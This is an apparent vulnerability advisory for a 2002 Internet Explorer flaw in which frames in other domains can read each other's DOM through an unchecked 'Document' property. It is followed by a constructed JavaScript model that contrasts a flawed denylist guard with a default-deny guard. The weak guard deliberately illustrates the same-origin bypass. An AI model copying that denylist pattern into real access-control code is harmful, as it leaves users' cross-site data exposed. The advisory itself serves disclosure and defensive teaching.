vendor: Internet Explorer
by: SecurityFocus
CVSS: 7.5 HIGH
Unauthorized Access
CWE: 284
Product Name: Internet Explorer
Affected Version From: Microsoft Internet Explorer 5.0
Affected Version To: Microsoft Internet Explorer 6.0
Patch Exists: Yes
Related CWE: None
CPE: a:microsoft:internet_explorer
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2002
Microsoft Internet Explorer DOM Access Vulnerability
Microsoft Internet Explorer (MSIE) is prone to a vulnerability that may enable a frame or iframe to gain unauthorized access to the Document Object Model (DOM) of other frames/iframes in a different domain. This is possible because MSIE does not perform adequate access control checks on all frame properties. While access to the 'document' property across domains is properly restricted, access to 'Document' is not. This may allow an attacker to violate the browser Same Origin Policy and gain unauthorized access to the properties of frames and iframes that are in a different domain.
Mitigation:
Ensure that access control checks are performed on all frame properties.
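
The gap described above and the mitigation, side by side, as an added example that is not code from Internet Explorer or from the original advisory. It is a simplified model: the frame object, the property sets, and the functions makeFrame, denylistGuard, defaultDenyGuard and readableProps are hypothetical names, and the sample values are constructed.

```javascript
// Simplified model (constructed for illustration) of a cross-domain frame wrapper.
// All names below are hypothetical; this is not Internet Explorer's implementation.

// Constructed stand-in for a frame loaded from another domain.
function makeFrame(origin) {
  const dom = { cookie: 'session=constructed-value', title: 'Other site' };
  // Two property names that reach the same DOM object, as the advisory describes.
  return { origin, document: dom, Document: dom, location: origin + '/', length: 0 };
}

// Weak guard: blocks a list of known-sensitive names and lets every other name through.
const BLOCKED = new Set(['document']);
function denylistGuard(frame, callerOrigin) {
  return new Proxy(frame, {
    get(target, prop) {
      if (callerOrigin !== target.origin && BLOCKED.has(prop)) {
        throw new Error('Access denied: ' + String(prop));
      }
      return target[prop];
    },
  });
}

// Hardened guard: every property read is checked, and the default answer is "deny".
// Only names explicitly marked safe are readable from another origin.
const CROSS_ORIGIN_SAFE = new Set(['length']);
function defaultDenyGuard(frame, callerOrigin) {
  return new Proxy(frame, {
    get(target, prop) {
      if (callerOrigin === target.origin || CROSS_ORIGIN_SAFE.has(prop)) {
        return target[prop];
      }
      throw new Error('Access denied: ' + String(prop));
    },
  });
}

// Audit helper: which of the given property names can the caller actually read?
function readableProps(guarded, names) {
  return names.filter((name) => {
    try { void guarded[name]; return true; } catch (e) { return false; }
  });
}
```

Running readableProps over every property name of the frame, rather than only the names known to be sensitive, is the check that exposes the unguarded alias in the weak guard.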